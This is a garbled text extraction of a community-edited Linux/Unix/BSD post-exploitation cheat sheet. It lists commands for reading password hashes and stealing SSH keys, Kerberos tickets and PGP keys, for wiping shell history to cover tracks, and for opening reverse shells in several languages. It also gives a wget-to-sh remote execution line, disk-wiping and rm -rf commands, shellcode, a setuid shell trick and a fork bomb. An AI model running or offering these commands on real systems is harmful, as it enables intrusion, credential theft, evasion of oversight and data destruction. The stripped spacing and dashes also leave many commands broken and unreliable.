Академический Документы
Профессиональный Документы
Культура Документы
CommandList
Ifforanyreasonyoucannotaccess/editthesefilesinthefuture,pleasecontact
mubix@hak5.org
YoucandownloadthesefilesinanyformatusingGoogleDocs
File>DownloadAsmethod
IfyouareviewingthisonanythingotherthanGoogleDocs,youcanget
accesstothelatestlinkstotheLinux/Unix/BSD,OSX,Obscure,Metasploit,and
Windowsdocshere:http://bit.ly/nuc0N0
DISCLAIMER:Anyonecaneditthesedocs,andallthatentailsandimplies
Linux/Unix/BSDPostExploitationCommandListPage:1
TableofContents
TableofContents
Information
BlindFiles
System
Networking
Useraccounts
Credentials
Configs
DetermineDistro
InstalledPackages
PackageSources
FindingImportantFiles
CoveringYourTracks
Avoidinghistoryfilesmys
Obtainusersinformation
Escalating
Lookingforpossibleopenedpaths
Maintainingcontrol
ReverseShell
FunifWindowsispresentandaccessible
Stufftobesorted
DeletingandDestroying
Executearemotescript
ForkBomb
Linux/Unix/BSDPostExploitationCommandListPage:2
Information
BlindFiles
(thingstopullwhenallyoucandoisblindlyread)LFI/dirtraversal(Dontforget%00!)
File
ContentsandReason
/etc/resolv.conf
Containsthecurrentnameservers(DNS)forthe
system.Thisisagloballyreadablefilethatisless
likelytotriggerIDSalertsthan/etc/passwd
/etc/motd
MessageoftheDay.
/etc/issue
Debiancurrentversionofdistro
/etc/passwd
Listoflocalusers
/etc/shadow
Listofuserspasswordshashes(requiresroot)
/home/xxx/.bash_history
Willgiveyousomedirectorycontext
System
Command
Descriptionand/orReason
unamea
Printsthekernelversion,arch,sometimesdistro,...
psaux
Listallrunningprocesses
topn1d
Printprocess,1isanumberoflines
id
Yourcurrentusername,groups
arch,unamem
Kernelprocessorarchitecture
whoisconnected,uptimeandloadavg
whoa
uptime,runlevel,tty,procesesetc.
Linux/Unix/BSDPostExploitationCommandListPage:3
gccv
ReturnstheversionofGCC.
mysqlversion
ReturnstheversionofMySQL.
perlv
ReturnstheversionofPerl.
rubyv
ReturnstheversionofRuby.
pythonversion
ReturnstheversionofPython.
dfk
mountedfs,size,%use,devandmountpoint[
mount
mountedfs
lasta
Lastusersloggedon
lastcomm
lastlog
lastlogin(BSD)
getenforce
GetthestatusofSELinux(Enforcing,Permissiveor
Disabled)
dmesg
Informationsfromthelastsystemboot
lspci
printsallPCIbusesanddevices
lsusb
printsallUSBbusesanddevices/h
lscpu
printsCPUinformation
lshw
ex
cat/proc/cpuinfo
cat/proc/meminfo
duhmaxdepth=1/
(note:cancauseheavydiski/o)
whichnmap
locateacommand(ienmapornc)
locatebin/nmap
locatebin/nc
Linux/Unix/BSDPostExploitationCommandListPage:4
jpsl
javaversion
ReturnstheversionofJava.
Networking
hostnamef
ipaddrshow
iproshow
ifconfiga
routen
cat/etc/network/interfaces
iptablesLnv
iptablestnatLnv
ip6tablesLnv
iptablessave
netstatanop
netstatr
netstatnltupw(rootwithrawsockets)
arpa
lsofnPi
toresumeitcat/proc/net/*(morediscreet)
whatdoestheabovemean?>Itmeansthatalltheinformationgivenbytheabovecommandscanbe
foundbylookingintothefilesunder/proc/net,andthatthisapproachislesslikelytotriggermonitoring
orotherstuff.
Useraccounts
localaccounts:cat/etc/passwd
passwordhashesin/etc/shadowonLinux
passwordhashesin/etc/security/passwdonAIX
groupsin/etc/group(and/or/etc/gshadowonLinux)
allaccounts:getentpasswd
shoulddumplocal,LDAP,NIS,whateverthesystemisusing
samewithgetentgroup
Sambasowndatabase:pdbeditLworpdbeditLv
privilegedaccounts:cat
(above:cat???)
mailaliases:cat/etc/aliasesfind/etcnamealiases,getentaliases
Linux/Unix/BSDPostExploitationCommandListPage:5
NISaccounts:ypcatpasswddisplaysNISpasswordfile
Credentials
SSHkeys,oftenpasswordless:/home/*/.ssh/id*
SSHagent:
Kerberostickets:/tmp/krb5cc_*,/tmp/krb5.keytab
PGPkeys:/home/*/.gnupg/secring.gpgs
Configs
lsaRl/etc/|awk'$1~/w.$/'|grepvlrwx2>/dev/nullte
cat/etc/issue{,.net}
cat/etc/master.passwd
cat/etc/group
cat/etc/hosts
cat/etc/crontab
cat/etc/sysctl.conf
foruserin$(cutf1d:/etc/passwd)doecho$usercrontabu$userldone#(Listsallcrons)
cat/etc/resolv.conf
cat/etc/syslog.conf
cat/etc/chttp.conf
cat/etc/lighttpd.conf
cat/etc/cups/cupsd.confcda
cat/etc/inetd.conf
cat/opt/lampp/etc/httpd.conf
cat/etc/samba/smb.conf
cat/etc/openldap/ldap.conf
cat/etc/ldap/ldap.conf
cat/etc/exports
cat/etc/auto.master
cat/etc/auto_master
cat/etc/fstab
find/etc/sysconfig/typefexeccat{}\
DetermineDistro
lsb_released
/etc/osrelease
/etc/issue
cat/etc/*release
#GenericcommandforallLSBdistros
#Genericfordistrosusingsystemd
#Genericbutoftenmodified
Linux/Unix/BSDPostExploitationCommandListPage:6
/etc/SUSErelease
/etc/redhatrelease,/etc/redhat_version
/etc/fedorarelease
/etc/slackwarerelease,/etc/slackwareversion
/etc/debian_release,/etc/debian_version
/etc/mandrakerelease
/etc/sunrelease
/etc/release
/etc/gentoorelease
/etc/archrelease
arch
unamea
#NovellSUSE
#RedHat
#Fedora
#Slackware
#Debian
#Mandrake
#SunJDS
#Solaris/Sparc
#Gentoo
#ArchLinux(filewillbeempty)
#OpenBSDsample:OpenBSD.amd64
#oftenhintsatitprettywell
InstalledPackages
rpmqalast|head
yumlist|grepinstalled
Debian:
dpkgl
dpkgl|grepilinuximage
dpkggetselections
{Free,Net}BSD:
pkg_info
Solaris:
pkginfo
Gentoo:
#equerymustbeinstalled
cd/var/db/pkg/&&lsd*/* #alwaysworks
ArchLinux:
pacmanQ
PackageSources
cat/etc/apt/sources.list
lsl/etc/yum.repos.d/
cat/etc/yum.conf
FindingImportantFiles
lsdlR*/#
lsalR|grep^d
find/vartyped
lsdl`find/vartyped`
lsdl`find/vartyped`|grepvroot
find/var!userroottypedls
find/var/logtypefexeclsla{}\
find/perm4000(findallsuidfiles)
Linux/Unix/BSDPostExploitationCommandListPage:7
lsalhtr/mnt
lsalhtr/media
lsalhtr/tmp
lsalhtr/home
cd/home/treels/home/*/.ssh/*
find/hometypefiname'.*history'
lslart/etc/rc.d/
locatetar|grep[.]tar$#Remembertoupdatedbbeforerunninglocate
locatetgz|grep[.]tgz$
locatesql|grep[.]sql$
locatesettings|grep[.]php$
locateconfig.inc|grep[.]php$
ls/home/*/id*
.properties|grep[.]properties#javaconfigfiles
locate.xml|grep[.]xml#java/.netconfigfiles
find/sbin/usr/sbin/opt/lib`echo$PATH|seds/://g`perm/6000ls#findsuids
locaterhosts
CoveringYourTracks
Avoidinghistoryfilesmys
exportHISTFILE=
or
unsetHISTFILE
Thisnextonemightnotbeagoodidea,becausealotoffolksknowtocheckfortamperingwiththisfile,
andwillbesuspiciousiftheyfindout:
Howeverifyouhappentobeonanaccountthatwasoriginallyinaccessible,ifthe.bash_historyfileis
available(lsa~),viewcatingitscontentscanprovideyouwithagooddealofinformationaboutthe
systemanditsmostrecentupdates/changes.
clearallhistoryinram
historyc
rmrf~/.bash_history&&lns~/.bash_history/dev/null(invasive)
touch~/.bash_history(invasive)
<space>historyc(usingaspacebeforeacommand)
zsh%unsetHISTFILEHISTSIZE
tcsh%sethistory=0
bash$set+ohistory
ksh$unsetHISTFILE
find/typefexec{}(forensicsnightmare)
Notethatyoureprobablybetteroffmodifyingortemporarydisablingratherthandeletinghistoryfiles,it
Linux/Unix/BSDPostExploitationCommandListPage:8
leavesalotlesstracesandislesssuspect.
InsomecasesHISTFILEandHISTFILESIZEaremadereadonlygetaroundthisbyexplicitlyclearing
history(historyc)orbykill9$$ingtheshell.Sometimestheshellcanbeconfiguredtorunhistory
waftereverycommandgetaroundthisbyoverridinghistorywithanoopshellfunction.Noneofthis
willhelpiftheshellisconfiguredtologeverythingtosyslog,however.
Obtainusersinformation
lsalh/home/*/
lsalh/home/*/.ssh/
cat/home/*/.ssh/authorized_keys
cat/home/*/.ssh/known_hosts
cat/home/*/.*hist*#youcanlearnalotfromthis
find/home/*/.vnc/home/*/.subversiontypef
grep^ssh/home/*/.*hist*
grep^telnet`/home/*/.*hist*
grep^mysql/home/*/.*hist*
cat/home/*/.viminfo
sudol#ifsudoersisnot.readable,thissometimesworksperuser
crontabl
cat/home/*/.mysql_history
Escalating
Lookingforpossibleopenedpaths
lsalh/root/
sudol
cat/etc/sudoers
cat/etc/shadow
cat/etc/master.passwd#OpenBSD
cat/var/spool/cron/crontabs/*|cat/var/spool/cron/*
lsofnPi
ls/home/*/.ssh/*
Maintainingcontrol
Linux/Unix/BSDPostExploitationCommandListPage:9
ReverseShell
Startinglistsourcedfrom:http://pentestmonkey.net/cheatsheet/shells/reverseshellcheatsheet
bashi>&/dev/tcp/10.0.0.1/80800>&1(No/dev/tcponolderDebians,butusenc,socat,TCL,
awkoranyinterpreterlikePython,andsoon.).
perle'useSocket$i="10.0.0.1"$p=1234socket(S,PF_INET,SOCK_STREAM,
getprotobyname("tcp"))if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S")
open(STDOUT,">&S")open(STDERR,">&S")exec("/bin/shi")}'
pythonc'importsocket,subprocess,oss=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)s.connect(("10.0.0.1",1234))os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)os.dup2(s.fileno(),2)p=subprocess.call(["/bin/sh","i"])'
phpr'$sock=fsockopen("10.0.0.1",1234)exec("/bin/shi<&3>&32>&3")'
rubyrsockete'f=TCPSocket.open("10.0.0.1",1234).to_iexecsprintf("/bin/shi<&%d>&%d
2>&%d",f,f,f)'nce/bin/sh10.0.0.11234#noteneedlonsomeversions,andmanydoesNOT
supporteanymore
rm/tmp/fmkfifo/tmp/fcat/tmp/f|/bin/shi2>&1|nc10.0.0.11234>/tmp/f
xtermdisplay10.0.0.1:1se
ListenerXnest:1
Addpermissiontoconnectxhost+victimIP
sshNR3333:localhost:22user@yourhost
nce/bin/sh10.0.0.11234
FunifWindowsispresentandaccessible
IfthereisWindowsinstalledandtheloggedinuseraccesslevelincludesthoseWindowspartition,
attackercanmountthemupanddoamuchdeeperinformationgathering,credentialtheftandrooting.
Ntfs3gisusefulformountingntfspartitionsreadwrite.
TODO:insertdetailsonwhattolookfor
Stufftobesorted
##GOINGTOMOVEEVERYTHINGHEREFORLEGIBILITYONCEEDITINGDIESDOWN
Command
Output
psaux
Listofrunningprocesses
id
Listcurrentuserandgroupalongwithuser/groupid
Showinfoaboutwhoislogged,whataretheyaredoing
Linux/Unix/BSDPostExploitationCommandListPage:10
whoa
Printinformationaboutusers
cat/dev/core>
/dev/audio
Makesasoundfromthememorycontent.
Usefulnessofthis???(none,asidefrompissingoffthesysadmin,inthe
veryunlikelycasethattheserverhasspeakersandthelegacyOSSdriver)
cat/dev/mem>
/dev/audio
sudop
allowstheusertodefinewhatthepasswordpromptwillbe
(usefulforfuncustomizationwithaliasesorshellscripts)
DeletingandDestroying
(Ifitisnecessarytoleavethemachineinaccessibleorunusable)
Notethatthistendstobequiteevident(asopposedtoasimpleexploitationthatmightgounnoticedforsometime,
evenforever),andwillmostsurelygetyouintotroubles.
Oh,andyoureprobablyajerkifyouuseanyofthestuffbelow.
Command
Description
rmrf/
Thiswillrecursivelytrytodeleteallfiles.
charesp[]__attribute__((section(.text)))/*e.s.p
Hexversionofrmrf/
release*/=
Howisthissupposedtowork?
\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68
\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99
\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7
\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56
\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31
\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69
\x6e\x2f\x73\x68\x00\x2d\x63\x00
cpp/bin/sh/tmp/.beyondchmod4755
/tmp/.beyond
mkfs.ext3/dev/sda
Reformatthedevicementioned,making
recoveryoffileshard.
ddif=/dev/zeroof=/dev/sdabs=1M
Overwritedisk/dev/sdawithzeros
Executearemotescript
wgethttp://server/file.shO|sh
Thiscommandforcesthedownloadofafileand
Linux/Unix/BSDPostExploitationCommandListPage:11
immediatelyitsexecution,canbeexploitedeasily
usingorreverseshit
ForkBomb
:(){:|:&}:
The[in]famous"forkbomb".Thiscommandwill
causeyoursystemtorunalargenumberof
processes,untilit"hangs".Thiscanoftenleadto
dataloss(e.g.iftheuserbrutallyreboots,orthe
OOMkillerkillsaprocesswithunsavedwork).If
leftaloneforenoughtimeasystemcaneventually
recoverfromaforkbomb.
Stolenfrom:http://incolumitas.com/wpcontent/uploads/2012/12/blackhats_view.pdf
World
Findwordwritablefoldersoutsideyourhome
writable
directory.Itwouldbeatremendoussuccessifwe
directories couldwrite,sayto/etc.Sowecouldaddconfiguration
filesandthereforeprettysureexecutecodeasroot,
sincemanydaemonsreadaspecificnumberof
primaryandsecondaryconfigurationfiles,whereas
thesecondaryonesareoftennotcreatedyet.Ifthe
superusershome(/root)wouldbewritable,wecould
createshellstartupfilesthatdoesn'texistyet:.profile,
.bash_profile,.bashrc...
find/\(
wholename
'/home/homedir/*'
prune\)
o\
(
typed
perm
0002\)
exec
ls
ld'{}'''2>/dev/null
World
writable
files
Whatif/etc/passwdwouldbewritable?Yeah,wejust
couldaddanotherrootuserandwewouldhavewon!
Whereastheforegoingscenarioisjusttoogoodtobe
true,itreallymakessensetosearchforworldwritable
filesoutsideyourownterritory(=yourhome
directory).
find/\(
wholename
'/home/homedir/*'
prune
o
wholename'/proc/*'
prune\)
o\(
typef
perm
0002\)
execls
l'{}'''2>/dev/null
Logfiles
Sometimesasecurityunawareadministratorchmods find/var/log
typef
perm
asensitivelogfile,becausehecouldn'tviewitand
00042>/dev/null
thereforeleakspotentiallysensitivedatasuchas
passwordsorotherimportantinformation.
Setuid/
Wealreadyexaminedfullywhysetuidandsetgidfiles find/\(
typef
or
typed\)
setgidfiles areworthtobedoublechecked.Suchafileownedby perm
60002>/dev/null
rootandsusceptibleforattacksisabigweakness.
Linux/Unix/BSDPostExploitationCommandListPage:12